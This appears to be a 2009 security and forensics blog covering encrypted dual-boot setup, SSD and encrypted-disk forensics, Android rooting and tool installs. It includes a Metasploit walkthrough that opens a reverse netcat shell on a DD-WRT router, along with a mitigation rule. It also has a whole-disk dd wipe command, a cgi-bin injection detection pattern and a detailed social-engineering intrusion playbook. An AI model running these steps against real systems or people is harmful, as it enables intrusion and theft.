Monday, 2 November 2009

Dual Boot Windows XP and BackTrack with Encryption

A number of people have asked me how I am dual booting Windows XP and BackTrack with both operating systems installed on fully encrypted partitions. The following is a rough guide to setting it up. It may not be the best way of setting up this type of configuration, but it works for my needs. Your experiences may vary. My laptop has a 200GB IDE hard drive in it. Please adjust for your spec.

Before starting you may want to wipe your entire hard drive.
  • dd if=/dev/urandom of=/dev/hda

The layout used here:
  • Windows XP encrypted with TrueCrypt 6.3
  • BackTrack /boot partition (not encrypted)
  • BackTrack / partition encrypted

Install Windows XP first (200GB)

Boot off the BackTrack 4 CD and run fdisk /dev/hda: create a /boot partition (hda2) of 200MB and a / partition (hda3) from the remainder of the disk. Then set up the encrypted partition.

  • modprobe aes-i586
  • cryptsetup luksFormat /dev/hda3
  • cryptsetup luksOpen /dev/hda3 root
  • mkfs.ext3 -j -O extent /dev/mapper/root

Run the BT installer and select /dev/mapper/root to be mounted as / and /dev/hda2 as /boot. Make sure you check the format box for /dev/mapper/root.

Do not reboot just yet; we need to modify a few files.

  • mkdir /mnt/root
  • mount /dev/mapper/root /mnt/root
  • mount /dev/hda2 /mnt/root/boot
  • chroot /mnt/root
  • mount -t proc proc /proc
  • mount -t sysfs sys /sys

Next we need to edit the /etc/crypttab file. I'm going to keep the name root for / .
  • root /dev/hda3 none luks

Next step is to edit /etc/fstab. The / and /boot entries should look like this. Amend if needed.

  • /dev/mapper/root / ext3 relatime,errors=remount-ro 0 1
  • /dev/hda2 /boot ext3 defaults 0 0

Next step is to add a few modules to the kernel.
Edit /etc/initramfs-tools/modules file and add the following to the end of the file.




Update your initrd with the following command.
  • update-initramfs -k all -c
I got an error when it tried to create an initrd file for kernel but BackTrack4 comes with so as long as you get no errors on the initrd for you should be good.

Now time to fix GRUB.
  • cd /boot/grub/
  • nano menu.lst

Your BackTrack section should look like this.

  • title BackTrack 4
  • uuid Your uuid of boot partition
  • kernel /vmlinuz- root=/dev/mapper/root ro quiet
  • initrd /initrd.img-
Next we need to install GRUB:
  • grub-install /dev/hda
Exit from the chroot environment, then unmount /mnt/root/boot and /mnt/root.

Using TrueCrypt 6.3 I fully encrypted the Windows system partition (not full disk encryption) and let it write its bootloader to the MBR. This will overwrite GRUB.

Don't worry we'll fix this later.

Boot with the BackTrack CD and copy the TrueCrypt bootloader from the MBR to a file in the /boot partition, in my case hda2.

I used these commands to do so:

  • dd if=/dev/hda of=/mnt/boot/truecrypt.mbr count=1 bs=512
  • dd if=/dev/hda of=/mnt/boot/truecrypt.backup count=8 bs=32256

Reinstall GRUB to the MBR using these commands:
  • sudo grub
  • install (hd0,1)/grub/stage1 (hd0) (hd0,1)/grub/stage2 0x8000 p
Add a chainloader to the menu.lst Windows XP entry pointing to the TrueCrypt bootloader within the /boot partition:

title XP
rootnoverify (hd0,0)
chainloader (hd0,1)/truecrypt.mbr
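As an added check (not part of the original post), the following shell functions validate two of the steps above before the reboot: that every /dev/mapper/<name> device in /etc/fstab has a matching luks entry in /etc/crypttab, and that the truecrypt.mbr file saved with dd is a single 512-byte sector ending in the 0x55AA boot signature. File paths are passed as arguments, so the functions can be run against the real files from the chroot or against constructed sample files.

```shell
#!/bin/sh
# Added example, not from the original post: pre-reboot sanity checks for the
# crypttab/fstab pairing and the saved TrueCrypt MBR copy.

# check_crypttab_fstab CRYPTTAB FSTAB
# For each fstab entry whose device is /dev/mapper/<name>, require a crypttab
# line whose first field is <name> and whose options field contains "luks".
# Returns 0 if all are present, 1 otherwise (missing names are printed).
check_crypttab_fstab() {
  crypttab=$1; fstab=$2; missing=0
  while read -r dev mnt rest; do
    case "$dev" in
      /dev/mapper/*)
        name=${dev#/dev/mapper/}
        if ! awk -v n="$name" '$1 == n && $4 ~ /luks/ { found = 1 }
                               END { exit !found }' "$crypttab"; then
          echo "fstab mounts $dev on $mnt but crypttab has no luks entry named '$name'"
          missing=1
        fi ;;
    esac
  done < "$fstab"
  return $missing
}

# check_mbr_copy FILE
# The file written by "dd if=/dev/hda of=truecrypt.mbr count=1 bs=512" must be
# exactly one sector and end with the 55 AA boot signature; otherwise GRUB's
# chainloader would be handed something that is not a boot sector.
check_mbr_copy() {
  f=$1
  size=$(wc -c < "$f" | tr -d ' ')
  [ "$size" -eq 512 ] || { echo "$f is $size bytes, expected 512"; return 1; }
  sig=$(tail -c 2 "$f" | od -An -tx1 | tr -d ' \n')
  [ "$sig" = "55aa" ] || { echo "$f lacks the 55AA boot signature"; return 1; }
}
```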

Monday, 21 September 2009

Dell R900 SQL Server 2005 Fails To Install

As part of a new platform deployment I recently took delivery of a number of servers, one of which was a Dell R900 with 4x 6 core processors. After a base install of Windows Server 2003 R2 x64 I attempted to install SQL Server 2005 Enterprise. Setup failed with the following error: The SQL Server service failed to start. For more information, see the SQL Books Online....

Microsoft has confirmed that on a computer that has a multicore processor, if the ratio of logical processors to physical sockets is not a power of 2, you cannot install SQL Server 2005. Microsoft SQL Server 2005 Service Pack 2 and higher fixes this. However, it is not possible to slipstream a service pack into the SQL 2005 install CD / DVD. A quick fix is to modify the boot.ini file and add /NUMPROC=1 to the boot options.

Install SQL Server 2005.
Install SQL Server 2005 Service Pack 3
Remove the /NUMPROC=1 from boot.ini and reboot.
SQL will now see all processors.

Thursday, 13 August 2009

SSD Drives and IT Forensics - Update

In a previous post, The implication of new firmware released for OCZ SSD on computer forensics, I asked a number of questions. The post was also sent to an internal mailing list where I work. A number of responses came back and I thought I'd share them.

1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?

The implications are wide ranging, but essentially the volume of recoverable data may be reduced. (Forensic analysis of deleted items, system artefacts, etc may not be possible). However, acquisition methods will not be affected.

2. Does the firmware start clearing sectors when it is simply connected to a power supply, or does it require other hardware to be attached?

3. If it starts clearing sectors when connected to a power supply, what legal implications will this have if, during the acquisition of the drive, potential evidence is being deleted by the built-in firmware before it can be forensically acquired?

No, the firmware does not clear sectors when powered up. It requires an operating system that supports the TRIM command. OCZ SSDs now have the ability to use TRIM under Win7, Linux and OSX, but only where the operating system, firmware, and associated software are correctly installed.

4. Are "live" acquisitions still possible with SSD drives with this firmware if we want to consider them forensically sound images. For example creating a logical evidence file of an open encrypted container file.

Yes, see above, as TRIM is not supported under the linux kernel (and would never be supported for a forensic distribution) there will be no loss of data during forensic acquisition.
The only potential issue would be a live acquisition under an operating system that does support TRIM (potentially windows 7).

Wednesday, 12 August 2009

The implication of new firmware released for OCZ SSD on computer forensics

UPDATE - Questions answered

On my daily trawl through various feeds (thanks Google Reader for making this so easy) I came across an article that discussed the "benefits" of this new firmware. While I tend to agree with the writer from a performance standpoint, the IT forensics voice in my head was saying this could make my job more interesting.

This firmware is designed to keep the speed of the SSD drive as close as possible to that of a new drive, even if the drive has been used over a long period of time. The flash memory used on the SSD drive is comprised of cells that usually contain 4KB pages arranged in blocks of 512KB. When a cell is unused, data can be written to it relatively quickly. But if a cell already contains some data, no matter how little, even if it fills only a single page in the block, the entire block must be rewritten.

This is because a memory cell has to be empty to have data written to it, even if it is only partially filled. The data already contained in the cell has to be copied to the cache, the new data is then added to the cache, the old data in the cell is erased and the new information in the cache is copied to the memory cell. As time passes and all the cells are partially filled with old data, the SSD slows down as new data has to be added using the same process.

Basically what this means is that the way many SSD drives write data is not very efficient, and leaves all kinds of un-used data all over the place, which later causes slowdowns when it is needlessly rewritten.

Now what the new firmware from OCZ does is apparently to fix this while the drive is idle, by clearing used memory cells of unneeded or unwanted data on a regular basis so they are instantly available for future use.

From a forensics perspective, could this be considered a built-in "wiping" function on SSD drives? It is also worth noting that this could become the standard for all SSD drives.

This raises the following questions:

1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?

2. Does the firmware start clearing sectors when it is simply connected to a power supply, or does it require other hardware to be attached?

3. If it starts clearing sectors when connected to a power supply, what legal implications will this have if, during the acquisition of the drive, potential evidence is being deleted by the built-in firmware before it can be forensically acquired?

4. Are "live" acquisitions still possible with SSD drives with this firmware if we want to consider them forensically sound images. For example creating a logical evidence file of an open encrypted container file.

I would be interested in reading comments from anyone who has tested this or even theories on dealing with this in the wild.


Monday, 10 August 2009

Root on HTC Magic


1 Click Android Rooting ...

I recently got a HTC Magic on Vodafone UK and decided that it was about time I got root on it.

Murphy's law states that anything that can go wrong will go wrong. Step 1 is always make sure you have a backup.

I downloaded the files from The Unlockr's Guide to getting root on HTC Magic. Since my phone is a Vodafone UK version I downloaded the 32B files.

After extracting the SDK to C:\AndroidSDK\ and the images to C:\AndroidSDK\tools,

I booted my phone into fastboot mode: power on the phone with the "Back" arrow held down.
Connect the USB cable, open a command prompt and run the following from your AndroidSDK\tools folder:

fastboot boot recovery-new.img

Your phone will reboot and you will be presented with the Android System Recovery Menu.
Choose the "Nandroid Backup 2.1" option. After 2-5 minutes, backups of your phone's system, boot, recovery, data, misc and cache images will be copied to the phone's SD card.

I then followed The Unlockr's Guide; unfortunately this didn't work for me and my phone just hung at the Vodafone splash screen. I left it for about 20 minutes thinking that maybe it was doing some post load installs, but no, not that lucky. Thinking that I may have just bricked my phone was not a happy feeling. Just as well I remembered Murphy and his laws. Now the next question: how do I get the backup back on to my phone? I tried to re-flash it by first wiping the failed flash:

fastboot erase system -w
fastboot erase boot
fastboot flash system system.img
fastboot flash boot boot.img
fastboot flash recovery recovery.img
fastboot reboot

No such luck; all the fastboot flash options returned the same error:

FAILED (remote: signature verify fail)

Browsing through the xda-developers forum I came across the following post by Amon_RA that had a modified version of the HTC Magic recovery image.
I downloaded this and extracted it to c:\AndroidSDK\tools

So booting into fastboot mode again, opening a command prompt and running the following from C:\AndroidSDK\tools

fastboot boot recovery-RAv1.2.0G.img

The phone will boot the recovery image and you will notice an option titled

Nandroid V2.2 Restore

Selecting this option started the restore process. 5 minutes later my phone was fully working again. I guess I'll be waiting a bit longer for a working "root" image.

Monday, 3 August 2009

Slipstream or integrate Office 2007 Service Pack 2 (SP2)

If, like me, you update and deploy software to new workstations on a regular basis, you will quickly grow tired of installing MS Office and then installing the latest service pack. This quick guide will assist in slipstreaming the latest service pack (SP2) into MS Office 2007. I will assume that you will be installing Office from a network share and have already copied the entire contents of the CD to this folder.

Download the standalone installer office2007sp2-kb953195-fullfile-en-us.exe to a temporary folder (c:\tmp)
Create folder called Updates (C:\Updates)
Open a command line window (CMD) and type the following on one line:

c:\tmp\office2007sp2-kb953195-fullfile-en-us.exe /extract:C:\Updates

Agree to the EULA and then close the Installer when completed.
Move the contents of the C:\Updates folder to the Updates folder in your Office 2007 install folder structure.

Enabling AHCI after installing Windows XP x64

Download the OS pre-install SATA drivers and extract them to a temporary location on the machine (c:\tmp).

Open Device Manager
Under IDE ATA/ATAPI controllers you should see something like: Intel ICH9 Serial ATA Storage Controller.
Right-Click on that and select Update Driver
Say no to connecting to Windows Update to search, hit Next
Select Install from a list or specific location (Advanced), hit Next
Select "Don't search. I will choose the driver to install", hit Next
Select Have Disk
Browse to the driver folder (c:\tmp\), highlight the iastor.inf file, hit Open, then select OK

Now you should have a list of controllers; select the ICH9 / AHCI driver
You'll get warned that installing the device driver is not recommended, click Yes to continue installing
Click Finish
If you have more than one Intel ICH9 Serial ATA Storage Controller you will need to do this for each before restarting
When the system boots enter the BIOS, navigate to the SATA Operation option or equivalent and set it to AHCI
Verify your SATA ports are enabled, save changes and exit.
After you log into Windows, your computer will find the "new" hardware. Wait until you get the popup message to restart your computer, say Yes to restart one last time.

Sunday, 26 July 2009

Exploiting the cgi-bin vulnerability in dd-wrt

Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. In this example we are attacking from the LAN side of a Linksys WRT54GS running dd-wrt V24-SP1 using factory default settings.

msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST
msf exploit(ddwrt_cgibin_exec) > set LHOST
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened ( ->
uname -a
Linux DD-WRTx86CI #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown

DD-WRT httpd vulnerability

As reported at there is a vulnerability in the http-server for the DD-WRT management GUI that can be used for execution of an exploit to gain control over the router.

Note: The exploit can only be used directly from outside your network over the internet if you have enabled remote Web GUI management in the Administration tab. As immediate action please disable the remote Web GUI management. But that limitation could be easily overridden by a Cross-Site Request Forgery (CSRF) where a malicious website could inject the exploit from inside the browser.

The guys over at dd-wrt have fixed the issue and generated new builds of the latest DD-WRT version. You can temporarily download these files from here until we did update the router database.
[UPDATE] The guys over at dd-wrt have integrated most of the fixed build files into the router database. You can check there if files for build 12533 are available for your router. If not (yet) please check the location mentioned above to obtain the files.

The exploit can also be stopped using a firewall rule: go to your router's admin interface > Administration > Commands and enter the following text:

insmod ipt_webstr
ln -s /dev/null /tmp/exec.tmp
iptables -D INPUT -p tcp -m tcp -m webstr --url cgi-bin -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp -m tcp -m webstr --url cgi-bin -j REJECT --reject-with tcp-reset

Press "Save Firewall" and reboot your router. This rule blocks any attempt to access something that has "cgi-bin" in the URL. You can verify that the rule is working by entering ;reboot in your browser. That should give a "Connection was reset" (Firefox).

Important Note: This only works for non-HTTPS requests. If you have HTTPS Management turned on under > Administration > Management > Remote Access, then turn it off. If you don't want to turn it off, you can only do an update.
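The webstr rule above rejects requests by URL, but it says nothing about requests that already got through. As an added example (not from the original post or the dd-wrt advisory), the shell functions below scan web server log lines for the request shape this exploit uses: a cgi-bin path carrying a shell metacharacter, literal or percent-encoded. The Common Log Format layout and the sample log are assumptions constructed for the example; a router's own log format may differ.

```shell
#!/bin/sh
# Added example, not from the original post: flag log lines that request a
# cgi-bin path with a command separator in the URL. The sample log below is
# constructed and only reuses the ";reboot" request the post itself mentions.

# request_url LINE: print the URL from the quoted request field of a CLF line,
# e.g. "GET /cgi-bin/;reboot HTTP/1.0" -> /cgi-bin/;reboot
request_url() {
  printf '%s\n' "$1" | awk -F'"' '{ split($2, r, " "); print r[2] }'
}

# is_cgibin_injection LINE: return 0 when the URL touches cgi-bin and contains
# a command separator (; | ` $( &&) either literally or percent-encoded;
# 1 otherwise. A plain grep for ";" would miss the %3B form.
is_cgibin_injection() {
  url=$(request_url "$1")
  case "$url" in
    *cgi-bin*) ;;
    *) return 1 ;;
  esac
  printf '%s' "$url" | grep -Eq '[;|`]|%3[Bb]|%7[Cc]|%60|[$][(]|%24%28|&&|%26%26'
}

# scan_log FILE: print "client url" for each suspicious line, so the number
# of output lines is the number of hits.
scan_log() {
  while IFS= read -r line; do
    if is_cgibin_injection "$line"; then
      printf '%s %s\n' "${line%% *}" "$(request_url "$line")"
    fi
  done < "$1"
}

# write_sample_log PATH: constructed CLF lines (not real traffic) for testing.
# Lines 2 and 3 are the literal and percent-encoded forms of the same request;
# line 4 is a legitimate cgi-bin page and must not be flagged.
write_sample_log() {
  cat > "$1" <<'EOF'
192.168.1.10 - - [26/Jul/2009:12:00:01 +0100] "GET /index.asp HTTP/1.1" 200 5120
192.168.1.22 - - [26/Jul/2009:12:00:05 +0100] "GET /cgi-bin/;reboot HTTP/1.0" 200 0
192.168.1.22 - - [26/Jul/2009:12:00:09 +0100] "GET /cgi-bin/%3Breboot HTTP/1.0" 200 0
192.168.1.10 - - [26/Jul/2009:12:00:12 +0100] "GET /cgi-bin/status.cgi HTTP/1.1" 200 1024
EOF
}
```

As the post notes for the webstr rule, HTTPS requests are not visible this way either, so the scan only covers plain HTTP logs.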

Friday, 15 May 2009

Disable System Beep In VMWare

Is the system beep in VMware hurting your ears when Linux or FreeBSD machines are rebooted?
Add the following line to the .vmx file for that vmware machine.

mks.noBeep = "TRUE"

Friday, 1 May 2009

Forensics and Disk Encryption

The challenges for the computer forensics investigator have increased over the past few years.
Companies are deploying disk and volume based encryption systems. The traditional method of “pull the plug” then forensically image the hard drive is changing.

Before powering down a computer, consider the potential of encryption software being installed on the computer or as part of the operating system. If present, appropriate forensic methods should be utilised to capture the encrypted data before the computer is powered down.

There are essentially two competing solutions

  • Gather the “best” evidence available
  • Allow the system to continue operation in an unhindered manner

With encrypted drives becoming more common in the corporate environment, this means that without the cooperation of the suspect or a master key / password supplied by the IT department the data is essentially unreadable.

Under ACPO guidelines (Good Practice Guide for Computer based Electronic Evidence V.3) there are no guidelines for the collection of encrypted hard drives. Similarly the US Secret Service Best Practice Guide for Seizing Electronic Evidence V.3 makes no mention of encrypted hard drives either.

Identifying encrypted disks

It depends on how the encryption works. You may want to look for the following:
icons in the taskbar
start menu entries
common filenames and paths (Pointsec, SafeGuard Easy, DriveCrypt, PC Guardian)
the MBR: most disk encryption software uses pre-boot authentication (for example SafeGuard)
mounted devices in the registry, a good way to determine volume encryption (for example TrueCrypt)

Prerequisites for live imaging

Document everything you do. Document everything you ask a trusted system administrator / information security person to do. In order to image a live system you need to be logged on as a local admin level user. The end result is the need to gather an evidential copy of a system.

A physical disk image may not be the best evidence as the data may be unreadable. Live acquisition enables the investigator to gather volatile information such as memory, process list, network connections, open files etc.

What is live imaging

Taking a copy of a system while that system is still functioning in a live environment.

Why would you image a live machine ?

Business critical systems that cannot be shut down. Shutting down systems may create legal liability for examiners through:

damaging equipment
unintentional data loss
hampering operations
Instructions that evidence gathering must be conducted using the least intrusive methods available.
Encrypted volumes


Helix (dd/netcat)
Prodiscover IR
Encase EEE/FIM

Issues surrounding imaging a live system.

The system is essentially “un-trusted”. This raises the following questions. How do we know we have collected all the original evidence on an un-trusted system? Can the machine be accessed remotely? Rootkits ?

Some options available for forensic imaging of encrypted drives.

Non Live Image

Microsoft Windows system
Capture live data: memory dump, current network connections, open files, running processes. Shut down the machine normally. Pulling the plug may cause data loss on encrypted drives.

Remove the drive

Image the drive using a forensic disk cloner such as a SOLO

Option 1

Single capture using two drives. Target and Backup
Bag & Tag the original
Bag & Tag the target
Boot suspect machine using the backup and admin level credentials
Live image of the machine

Option 2

DD capture using two drives
Bag & Tag the original
Bag & Tag the target
Restore backup dd image to a “restore drive”

Option 2A

Boot suspect machine using the “restore drive” and admin level credentials
Live image of the machine

Option 2B

Mount restore drive in VMware
Boot suspect machine using the “restore drive” and admin level credentials
Live image of the machine

Image the drive with encase then follow Option 2A or Option 2B

Live Image

Microsoft Windows system
Capture live data: memory dump, current network connections, open files, running processes
Disconnect from the network, both wired and wireless.
Run ftkimager from a trusted CD or USB drive (having noted the serial number and other identifying features so it can be recognised in the registry if required at a later date).
Create a logical evidence file of each logical drive on an external USB hard drive (having noted the serial number and other identifying features so it can be recognised in the registry if required at a later date), ensuring you hash the drive contents.
Create a backup copy of the logical evidence files on another drive.
You may also create the two copies at the same time by connecting the two drives to the suspect machine.
Verify both target and backup images.
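As an added example (not part of the original post), the shell functions below do the last three steps in one pass: a single read of the source is written to both the target and the backup drive while the stream is hashed, and each copy is then verified against that hash. The constructed file standing in for a logical drive is an assumption for the test; on a real acquisition SRC would be the device or the evidence file produced by the imaging tool, and the printed hash is what goes in your notes.

```shell
#!/bin/sh
# Added example, not from the original post: image once to two drives, hash
# the stream as it is copied, and verify both copies afterwards.

# sha256 [FILE]: GNU coreutils sha256sum, falling back to shasum on systems
# without it; with no FILE it hashes stdin.
sha256() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$@"
  else
    shasum -a 256 "$@"
  fi
}

# image_twice SRC TARGET BACKUP: one read of SRC, two copies written, and the
# SHA-256 of the bytes that went down the pipe printed on stdout. Hashing the
# stream rather than re-reading SRC means the recorded hash is of exactly the
# data that was copied.
image_twice() {
  dd if="$1" bs=4096 2>/dev/null | tee "$2" "$3" | sha256 | awk '{ print $1 }'
}

# verify_copies HASH FILE...: every FILE must hash to HASH. Each result is
# printed (OK/FAIL) and the function returns 1 if any copy does not match.
verify_copies() {
  expected=$1; shift; bad=0
  for f in "$@"; do
    actual=$(sha256 "$f" | awk '{ print $1 }')
    if [ "$actual" = "$expected" ]; then
      echo "OK   $f $actual"
    else
      echo "FAIL $f $actual (expected $expected)"
      bad=1
    fi
  done
  return $bad
}
```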

Thursday, 23 April 2009

Backtrack 4 Beta and Nessus 4.0.0

I recently installed Nessus 4.0.0 on a vmware install of BackTrack 4 Beta. Below are the steps I took.

Download the following linux packages from the nessus website.


You will also need to register in order to obtain the activation key.

Before installing we will need to install some missing dependencies

apt-get install libqt4-core libqt4-gui libqtcore4 libqt4-network libqt4-script libqt4-xml libqt4-dbus libqt4-test libqtgui4 libqt4-svg libqt4-opengl libqt4-designer libqt4-assistant

Install the server.

# dpkg -i Nessus-4.0.0-ubuntu804_i386.deb

Configure the certificate

# /opt/nessus/sbin/nessus-mkcert

Add the admin user

# /opt/nessus/sbin/nessus-adduser

# /opt/nessus/bin/nessus-fetch --register 'your_registration_key'

# dpkg -i NessusClient-4.0.0-ubuntu804_i386.deb

# /etc/init.d/nessusd start

And start the client from Menu > Internet > NessusClient or use the CLI.

Wednesday, 22 April 2009

Social Engineering Investigations

Below is a general outline for investigating social engineering style attacks. This article is meant for discussion purposes only.

One thing you need to be aware of is that social engineering is not just limited to IT systems it is an issue for the entire organisation.

Social engineering attacks can vary from low tech to high tech.

There are many factors that can lead to a successful social engineering attack.

Normally an attacker would first take a look at the company website as these are normally filled with lots of useful information, such as the names, positions and phone numbers of staff.

Organisations need to be aware of just how much information they are giving away on their websites.

It's also common practice in organisations that a user's email address will be the same as their network user name. The password for email may also be the same as the network logon; this is normally true where an organisation is using Microsoft Exchange.

Armed with this information an attacker may call the help desk posing as someone in a senior position in the organisation asking for "help" on how to connect to the network from home. Help desk staff have been surprisingly helpful to me in the past when I have attempted this type of attack.

An attacker may also pose as a sales rep, as an employee of an IT related magazine or journal, or even as someone seeking employment, and ask to speak to the help desk / IT department. When connected they would ask a series of questions relating to the computer systems in place, such as operating systems (Windows, Apple Macs, Linux / Unix), network infrastructure, wireless, remote access, web based email etc.

This information can help an attacker target specific areas of the network, such as wireless access points or remote access systems.

Also, organisations will typically have large bins outside the premises: around the back, near the car park, at basement level etc. Since the bins are collected and / or emptied by third parties, access to them is rarely restricted.

The amount of information that can be recovered from looking through a company's rubbish can be very rewarding: customer records, employee records, financial statements and other sensitive company data. This style of attack is commonly known as "dumpster diving".

These points would typically be the first steps, as the attacker never has to enter the building to gain access to sensitive information about the organisation. This raises an interesting question: since people are volunteering the information, has the attacker broken any laws? Also, if the bins are in a publicly accessible / shared area, has the attacker broken any laws by "dumpster diving"?

An attacker could also just walk in the front door, past security and reception staff. Mornings and lunchtimes are always a good time to attempt this as there is a constant flow of people leaving and entering the building.

Other common entry points would be via the car park. But by far the best way in is with the smokers. The attacker will hang around outside, start chatting to other smokers and then just walk into the building with them. Once in the building it's easier to move around, because if you're there people assume that you're supposed to be there; after all, you've been seen outside smoking and talking with genuine employees. An attacker may then install various keyloggers, covert wireless access points or other bugging devices. Even something as simple as walking up to a printer and taking "your" printout will go unnoticed.

The likelihood of the above attacks being detected is low.

Prevention of some of these types of attacks can also be difficult.

The physical security of the building and its associated property should be monitored by a combination of monitored cctv and security guards. Bins should be locked and / or held in a secure area until they are collected.

Now for the IT side of things. This is normally shorter, as the trick is to get into the building. The majority of the time sensitive data is not stored on employees' computers or laptops but on servers. These servers are typically kept in locked rooms secured by a physical lock and / or an electronic lock such as a swipe card or proximity card. Access is generally restricted to a few IT staff. If the attacker wanted to gain access to this room for whatever reason, stealing the physical hardware for example, they would first need to find out who has access to the room and then attempt to covertly copy their access card.

Often, if the attacker really needs to access server stored data, it's more efficient to attempt to "hack" into the network from the inside, or even simply find a desk and call the IT department and ask them to reset "your" password.

The attacker may even simply pick up a laptop and walk out.

If the attacker really needs access to the server room they may pose as an engineer from one of the organisation's 3rd party support vendors or even from the local telecoms company. A little work with some logos downloaded from the vendor's website, a colour printer and a laminator or plastic card printer are all that's needed to add credibility to the attacker's "story" as to why access is needed. Add in a few business cards with the "office" phone number and a work order, and the attacker may even be given unsupervised access to the server room or other sensitive areas of the business such as meeting and conference rooms.

The more high tech attacks are normally associated with phishing style attacks, where an attacker will set up a fake website to look identical to the organisation's, with a URL that closely matches the organisation's. The attacker will typically focus on the logon page or other pages that prompt the user for sensitive information. The end user will typically not know that their details have been "stolen". In the more sophisticated version of this attack the attacker will capture the user data and then "send" that data to the genuine site for processing. If the details are correct the user will be presented with a valid session; if not they will get the standard logon failed message.

Now the people side of things is always going to be the hard part to protect yourself from.

Staff will need to be trained on the Do's and Don'ts of both the security surrounding the building and the IT systems.

The help desk staff should be trained to ask specific security questions in order to verify the identity of a user; relying on caller ID or someone's post code, zip code or date of birth is not sufficient. Caller ID is easy to fake and a person's home address is not too difficult to obtain.

Reception staff, PAs and secretaries are your first line of defence against telephone style attacks. These staff members should be trained in filtering out the false calls from the genuine. Keep in mind that not all false callers can be stopped here, but they can at least be slowed down.

All employees should be made to feel comfortable challenging people they personally do not recognise or any "employee" not displaying a valid ID card.
All non-employee visitors to the building should be escorted everywhere.
Visitors should not be given access to the organisation's network unless authorised.
Be wary of IP telephones in semi-public areas such as a reception area: these phones are connected to the organisation's internal network and typically have two network ports, so all an attacker would need to do is connect their laptop to the IP phone to reach the organisation's network. The same applies to wired / wireless internet access for guests. Guest internet access should be on a separate network segment or VLAN with access to the corporate LAN denied.

Do you think you would fall victim to a social engineering attack? Ask yourself the following questions:

Do I know everyone in the building ?
Would I hold an access controlled (swipe / proximity card) door open for someone if they were carrying something?
Would I challenge someone if I could not see their employee id badge ?
Would I lend mine to someone who approached me at the coffee machine if they said they left theirs in their car ?
Would I let someone in if I saw them chatting to one of the PAs or secretaries?
If someone called me on an internal extension claiming to be from the IT department would I give them my password ?

People are the weak link in the chain here. An attacker will use people's natural willingness to help against them. This is why social engineering attacks work: because they are allowed to work.

Investigating this type of attack.

The fact that you know an attack has taken place is a good start.
How was it detected ?
When was it detected ?
When did the attack take place ?
How was the attack carried out ?

How to investigate this type of attack is something that needs to be handled carefully. The aim really being "How did someone manage to steal our assets, be that information, hardware or both?"
This would typically start with interviewing any persons identified from the previous questions. One thing to keep in mind is that people will feel embarrassed about coming forward and talking about the "attack".

They may feel guilty about any information they may have divulged. I would suggest that a third party conduct these interviews anonymously, i.e. people do not have to give their names to the interviewer and the interview is carried out in confidence that no disciplinary action will be taken. The attack will have succeeded because of either a lack of controls or the lack of proper implementation, monitoring and enforcement of controls. Take the employee ID card as an example. Most policies state that "employees are required to have their ID cards visible at all times". Is this true for the organisation? Is this policy actually enforced? In my experience the companies that enforce this are few and far between.

These attacks usually result in your staff being more aware of just how easy it is to leak data without even knowing it. I feel that an organisation should notify all its staff when a social engineering style attack has been discovered so that they may all learn from it. Remember that your staff are your first line of defence against a social engineer.

Tuesday, 21 April 2009

EnCase and Tableau Forensic Bay

Came across this issue today and thought I'd share it with you.

I recently installed the latest version of EnCase. Reading the release notes, hard drives connected to Tableau write blockers are now recognised by EnCase as being write blocked. Since we use a large number of Tableau devices I started testing.

In testing I have found this to be true for the Tableau T35es, T35e, T3u, T4, T14 and T15.

When testing with the T335 (Forensic Drive Bay Controller, firmware 6.22) I found that EnCase is not correctly identifying a drive as being write blocked.

Test Results

  Test   IDE          SATA1        SATA2        EnCase reports
  1      Read Only    Read Only    Read Only    all drives as write blocked
  2      Read Write   Read Write   Read Write   all drives as not write blocked
  3      Read Only    Read Write   Read Only    all drives as write blocked

This can be an issue: if you believe what EnCase is telling you while creating a forensic image of a suspect drive that is actually sitting in a read/write bay, you may accidentally alter potential evidence, yet the EnCase report will state that the drive was acquired while write blocked.

I have made Guidance Software aware of this issue.

Guidance Software have created defect number 28371 for this issue.

Monday, 20 April 2009

Install OpenOffice 3.01 in Backtrack 4 Beta

I decided to install OpenOffice in BackTrack since it is not part of the default package because of size limitations. I always find it useful to have a spreadsheet application installed as part of my pen-testing toolkit.
Get the Linux DEB. I am using the English (US) package.

tar -zxvf OOo_3.0.1_LinuxIntel_install_en-US_deb.tar.gz
cd OOo_inst_folder/DEBS
dpkg -i *.deb

(Not sure this is needed for KDE but I did it for the icons in kmenuedit)
cd desktop-integration
dpkg -i *.deb

Add it to the KDE menu. If you are using Gnome you don't need to do this.

In kmenuedit, click on Utilities
Ctrl+N (New)

Name: OpenOffice3 (or whatever you want)
Command: /opt/openoffice.org3/program/soffice
Click on the blank icon next to the name and pick an icon for OpenOffice
Ctrl+S (Save)

Thursday, 16 April 2009

Increase the number of tcp connections in Windows XP

Half-open limit fix is a program designed to change the maximum number of concurrent half-open outbound TCP connections (connection attempts) in the Windows system file tcpip.sys.

Microsoft first introduced this limit in Windows XP SP2 (Service Pack 2) and it is present in all later versions of Windows. This was done to slow the spread of viruses and malware from system to system and also to reduce the impact of infected systems participating in DoS (Denial of Service) attacks.

This limit makes it impossible for Windows systems to have more than 10 concurrent half-open outbound connections. After 10, new connection attempts are queued and forced to wait.

Wednesday, 15 April 2009

FreeNAS - Transmission and Windows Remote Client

I've been playing around with FreeNAS for some time now and have migrated an old Debian server over to FreeNAS in order to make things easier for the non-Linux members of our team.

The server hosts all the deployment images for our lab workstations among other non-sensitive data. The images are deployed via PXE; more on that to follow in another post.

I recently looked at the BitTorrent service, which seems like a good idea. All your torrents are controlled and downloaded to a central location. Ideal in a lab environment. Downloading the latest version of Ubuntu or OpenOffice is now as simple as dropping the .torrent file into the shared directory and letting FreeNAS take care of the rest.

